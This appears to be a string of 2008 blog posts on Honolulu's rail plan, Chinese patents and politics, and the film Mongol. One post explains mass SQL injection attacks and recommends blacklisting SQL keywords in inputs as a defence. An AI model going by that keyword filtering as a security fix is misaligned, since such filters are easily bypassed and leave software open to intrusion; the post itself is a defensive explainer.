Here in Sim City, engineering is not one of our strong suits. I had the extraordinary experience of writing the “rail” bus with Cliff Slater and Mayoral Candidate and Engineer Panos Prevedouros on Saturday. I was so moved by the experience that I am driven to write about it.

First, going West from Ala Moana to Mapunapuna, Panos talked about the critical need to synchronize the traffic signals.  This is not high-tech.  He also showed us the path and capacity of the HOT lane he is proposing, which at some points in the downtown area is below the street, and that’s an interesting engineering and traffic management challenge. He is confident it can be done and that it will work.

But nothing compared to the engineering challenges we saw going East on the way back, where starting on Dillingham he gave us an engineering tour of the proposed rail line as it comes back into and through downtown and to Ala Moana Center and then terminates at the University.

We just followed the City’s map to see where the proposed line is supposed to be going, how high and wide it would be and where the stations were. It was a real eye-opener, a revelation for everyone on the tour. We had no idea of what is going to happen to our City.

Actually, you wouldn’t believe it. The rail is going to tear up and permanently reduce a number of streets and intersections. Where there are 4 lanes there will be two because of all the supporting structures and pilons they’ll have to build. You won’t be able to drive down those streets anymore – too narrow. Many of them will lose their sidewalks too.

Dillingham will be different and dark. Those stations are 200 feet long and 60 fee wide and over everything. The engineering will change those neighborhoods forever. The merchants at the stations will do fine, but those in the middle will be in no-man’s land. Lots of land will have to be condemned where the streets are less than 60 feet wide.

The rail, if you didn’t know it, doesn’t follow a straight path, it twists and turns in every direction. Since it is a railroad, these turns can’t be at 90 degrees, The train has to make large sweeping turns. The sharper the turn, the louder the squeal of the steel wheels. In any event, large areas will have to be condemned and demolished to accommodate the turns. It will cost a fortune – is this and the related litigation included in the price tag?

The line comes East on Nimitz, Halekawila, Queen and Waimanu Streets - these will have the rail overhead and will be forever lost in the shadows. I can only think of the elevated line in upper Manhattan, something that lower Manhattan would never tolerate these days. Depressing for retail, a magnet for crime. Are we going to love it?

The engineering really gets dicey around Ala Moana – the top of the station at Ala Moana climbs to 135 feet, a 13-storey building. The pilons will be frequent and formidable, and they will have to punch through all that concrete on the mauka side of Ala Moana Center on Kona Street. It will cost a fortune. Will General Growth agree or just say no?

To get to the Ala Moana station at 135 feet in the air, the train will have to climb at a 5 percent grade along Kona Street. That’s a very steep grade for a rail line – and as high as a roller coaster. Watch for vertigo. This will involve huge engineering issues. I suppose we’ll solve these problems as we go, and those lessons will be costly. I imagine we’ll have to import and pay for lots of engineering talent from the mainland.

Thence in a sharp left turn from Kona across Atkinson and then again right to pass over the all-ways intersection at the Convention Center, then down the middle of Kapiolani to University, then a left turn up University, past Date and ultimately across King to the University. All of this way above grade, dwarfing everything around it. The City will look like Frankenstein.

I haven’t gotten into exactly where the stations are, since looking at those locations as shown on the City map it was hard to imagine that the City would actually put them in the places shown. Sometimes they were way too far apart and sometimes much too bunched up. There were three within 1/2 mile, for example, near the University.

There’s more. I could go on, but never do the tour justice. Why don’t you contact honolulutraffic.com and see if you can get on the tour yourself and see what I mean.  Whatever your disposition, it’ll change the way you think.

Although China has established itself as manufacturer for the world, most of the products it manufactures are invented elsewhere, so the profit China has made in manufacturing goods has been relatively small.

This is changing.  The website for SIPO, China’s Intellectual Property Office (sipo.gov.cn) reports that patent filings in China have dramatically increased every year since 1985, when the Patent Law was enacted.  In 2006, 573,000 applications were filed and 268,000 were granted.

It’s no surprise that China’s leaders have been urging companies to be more innovative and to put more money into developing new IP.  That pitch must have worked, since China now generates the third highest number of patent applications, behind only Japan and the U.S.

Chinese inventors are also filing for international patents.  Of 156,000 patents filed with the World Intellectual Property Organization (WIPO) last year, 5,500 came from China.  This represents a 40% annual increase for China, now 7^th worldwide.  The U.S. is still on top with 52,000, but China is competing vigorously, just as in the Olympics.

It’s not like SQL injection attacks are new.

They go back to at least late 2004, when they appeared in Europe and Asia.  A German TV station was attacked, then a Taiwanese security magazine.  In 2006, Russian hackers broker into a Rhode Island government website and stole credit card data.

The attacks were proliferating.  In 2007, a hacker defaced the Microsoft UK web site.  Later on that year, the UN website was defaced with a SQL injunction attack.  Have they no shame?

In January 2008, tens of thousands of PC websites were defaced by automated SQL injection attacks that exploited the vulnerability of Microsoft SQL server.

In April 2008, the social security numbers of the sex offenders on the Sexual Offender Registry of Oklahoma were stolen by an injection attack.

In May 2008, a server farm in China used automated queries to Google’s search engine to identify SQL server websites that were vulnerable.

In July 2008, the Malaysian site for Kaspersky, a Russian computer security company, was hacked using a SQL injection.

From April 2008 to the present, there have been increasing SQL injection attacks exploiting the SQL injection vulnerability of Microsoft Internet Information Services and SQL server.

HOW THE INJECTION ATTACK WORKS

These attacks don’t require the hacker to have access to the server or, for that matter, the names of database fields.  The attack is on all text fields in all tables with a single hacked SQL request.  The attack attaches an html string to each field that activates a malware javascript file called from a remote location.  When that value is later displayed to a user of the hacked site, the script tries to gain control over the user’s system.

The number of exploited web pages is estimated at 500,000 so far, and growing daily.  These attacks are across the board, against government sites and well as commercial sites, and against open source SQL as well as Microsoft SQL.  The attacking mechanisms can be manual or by automated spiders or by modified versions of popular software such as QuickTime and RealPlayer.

SQL is a rich and complex language, so there are many techniques by which the attack can be accomplished.  The common approach is for the hacker to modify a variable being passed from the user’s browser URL address line or from a form on the browser to a SQL search string which is being processed on the website.

With this approach, hackers or their automated spiders can inject draconian instructions into the SQL commands written for the site, and these can do any number of awful things, like stealing all the data from the SQL database, destroying the database altogether or modifying the records by adding references to remote malware that spreads the attack through innocent visitors using the site, in a kind of Trojan horse virus.

HOW DO YOU KNOW YOU’VE BEEN HIT

Don’t think you’re somehow exempt.  If you’re using SQL in any form you’re vulnerable.  Most websites are data driven these days, and most of those use SQL in one form or another.  The hackers and their spiders may very well visit an attack on your site any time.

It goes without saying you need to back up your SQL database, all of it, every day and keep those backups for perhaps a longer period of time than before.  If you have 10 days of backup but you don’t watch your site and 10 days go by, you won’t have a useable backup and you’ll be SOL.

How do you know you’ve been attacked?  Well, the data on your screen is truncated and you get strange characters like hanging apostrophes and angle brackets on your screen where database information ought to be.  Sometimes you get wise guy jokes there too.  Don’t click on what appear to be links - that’ll get you in more trouble and infect your machine too.

HOW TO DEAL WITH THEM

If you’ve been attacked, you need to go to Internet Information Services (IIS) on your server and cut user connections, and stop the site.  Then you need to find a good backup file to restore your database.  For that, you need to figure out when the attack happened so you can use a backup from before it happened.  If you don’t have a good backup, you’ll probably have to clean the database manually to recover the data for your site

That means stripping out all the bad values and references that were injected.  You have to painstakingly go through every field, record and table.  In a big database, this can take forever, and it’s tedious and gut-wrenching work.  Worse, it may not be a complete solution.  The injection values are usually injected at the end of the existing values in the field, but if the injection values are longer than the field, they may write over the existing values, and that means the original data is lost.

When you’re done, you would turn IIS back on and see if you’ve done a good job, and whether there is some other gift they left for you.  You don’t know until you bring the site up again and watch it work.

There are some scripts out there that say they can reverse the attack and clean the injected values out of your database. Here’s an example:

http://hackademix.net/2008/04/26/mass-attack-faq/#webdev

Different hackers inject different values, so there’s no guarantee that this will work.

Even assuming you can restore your database, you could have another attack any time with similar result.  So if you have a good backup file of your database, make a protected copy of it for future use if necessary.

CLOSING THE VULNERABILITIES

Beyond that, you or your web designers need to close the vulnerabilities.  You can do that in a variety of ways, all of which involve new coding.  Go slowly and carefully, file by file, so you do it right and don’t miss anything.

When you recode, you need to write routines to clean all the parameters that are being fed into your SQL queries.  To do this, you need to strip out any questionable SQL commands that could be part of an injection attack, including DECLARE, SELECT, SET, CAST, DROP, EXEC,”;”, “–”, INSERT, DELETE, XP_, VARCHAR and CHAR, among others.

This is also quite tedious for a website of any size, but necessary if you want to avoid doing the whole thing again.  There are also other things you can do to make your code less vulnerable.  Here’s a couple of links that will help you understand what needs to be done.

www.f-secure.com/weblog/archives/00001427.html

www.sitepoint.com/article/794

www.wwwcoder.com/main/parentid/258/site/2966/68/default.aspx

www.imperva.com/application_defense_center/white_papers/sql_injection_signatures_evasion.html

There are some programs that claim to identify your vulnerability to SQL injection attacks.  One is the Acunetix Scanner, used by a great number of U.S. and foreign companies and government agencies.  I guess it must be of some value.  Check it at www.acunetix.com.

There are books that can help.  See O’Reilly’s SQL Hacks by Andrew Cumming and Gordon Russell available at Amazon and Barnes and Noble.

WILL WE EVER CATCH THESE GUYS

This global proliferation of SQL injection attacks is not only irritating, it’s scary in that it has the ability bring sites down all over the world.  It’s time for Microsoft to catch up.  It’s also time for world police authorities to catch up, and get serious.  This isn’t child’s play any more.

China’s central government is making itself downright unpopular these days.  Cyberspies against the blogs?  Emptying dormitories to prevent student demonstrations?  Repressing news of earthquake failures?  Pushing Tibet to the limit, then publishing a list of does and don’ts telling tourists they could be arrested for wearing Free Tibet t-shirts. Disbarring a lawyer who agreed to represent a Tibetan?  You’re kidding.

While we have certainly admired China’s remarkable tech and business success, the notions of personal freedom and representative government still seem tenuous, and recent Tiananmen tactics attempting to sterilize things for the Games show us that the government still doesn’t get it.

They may think they can beat off the real mood of China, but it looks like other forces are in play.  E-Democracy is on the rise and there’s not that much the repressors can do about it.  Given the way the Chinese have e-Connected with the world, and with themselves, I suggest that they are more likely to take new risks to achieve Western liberties these days.

China rising is also China rising in the rule of law.  Sure, the government can take steps to cauterize unpleasantness and head off bad press, but the genie is out of the bottle.  Given the e-Infrastructure already in place, the government cannot control, and is not exempt from, the will of the people.  After all, this is the 21^st Century and tech is everybody’s genie.

Watch what happens in August.  Through the Internet, Smart Mobs are also rising in China.

The point, which I first noticed in House of the Flying Daggers, is that movies aren’t limited to Hollywood or the U.S. or even Europe anymore.  China has shown that it can make world class movies, and now Russia, probably with a lot of help from China, can do likewise.  If successful movie recipes were proprietary, they aren’t any more.

Enter Mongol, the story of Genghis Khan’s rise to power and Mongolia’s rise to empire.  Genghis Khan was one of the most powerful men that ever lived, and the movie is a study in that power.  It was directed by Russian Sergei Bodrov, who studied Genghis Khan and Mongolia in depth.  These are things we don’t know much about, and they are fertile ground for a movie this big.  Remember, the Mongols ruled Russia for 200 years.

An international Asian cast.  They went all over the world for casting.  They found Japanese actor Tadanobu Asano (who recently starred in a Zatoichi movie – the blind swordsman) to play the Temudgin, that is, Genghis Khan.

And sassy Khulan Chuluun, Temudgin’s wife, a complete knockout, in a love partnership that would be extraordinary in any age, much less the 12^th century.  This Mongolian actress was freshly discovered for the movie, and had never acted before.

Temudgin’s blood brother later turned blood enemy is Jamukha, played by a Chinese actor Honglei Sun, from The Road Home, a early Zhang Yimou, Ziyi Zhang movie.  A powerful and charming character.

Everyone else in the movie is played by a Mongolian, and they are a handsome people.

The crew was 600 and the cast was 1,000, since they had battles to do.  And you’ve never seen battles quite like this.  Don’t fool with the Mongols.  Shot in the most incredible scenery in really remote locations in China, Mongolia and Kazakhstan (like 12 hours by car on rudimentary roads from the nearest towns).  Similar to the scenery in Daggers, with open spaces as far as the eye can see, captured in eye-popping cinematography.

This is not an American movie, although I suspect there is some American money, technology and technical expertise in here.  Mongol has been nominated for an academy award.  The credits read something like Daggers, international but mostly Asian, and you can see that they spared no expense in their efforts.

Bodrov was culturally sensitive, as one should be for a movie like this.  He went to visit the chief shaman of Mongolia in Ulan Bator to ask permission to make the movie.  The shaman granted the request, and was appreciative that Bodrov had asked.  Good move.

You can touch the city scenes, the costumes, the textures.  This movie takes you back to that time, making you wonder how it would be to live among them, making you compare your life to theirs.  It’s transporting.  The music, filled out by musicians Bodrov found in Mongolia, is haunting and exotic, a huge factor in bringing you back there.

The movie is entirely in Mongolian (Temudgin says it’s the most beautiful language in the world) and there are subtitles. But that doesn’t slow it down for a minute.  It engages you completely from the onset and throughout.  I walked out wishing there was more – feeling cheated out of the further history that followed Temudgin’s rise to power.

Can you remember the last time you saw a Russian movie?  Not me.  And yet here it is bursting onto the international screen with everything you would want.  This is a movie that will keep you at the edge of your seat throughout, from Mongolian history to horrific violence to larger than life characters, and back again.  It’s fast, and it’s furious.

Movies are one of the great cultural experiences of our lives, and they are becoming completely global.  Distance and language aren’t barriers anymore.  What a great time to be alive, to be able to experience a movie like this.  It’s great to learn how these people lived in the 12^th century (life was tough and short), but it’s even better to be able to watch it all unfold with Dolby 900 years later.

This one will play everywhere.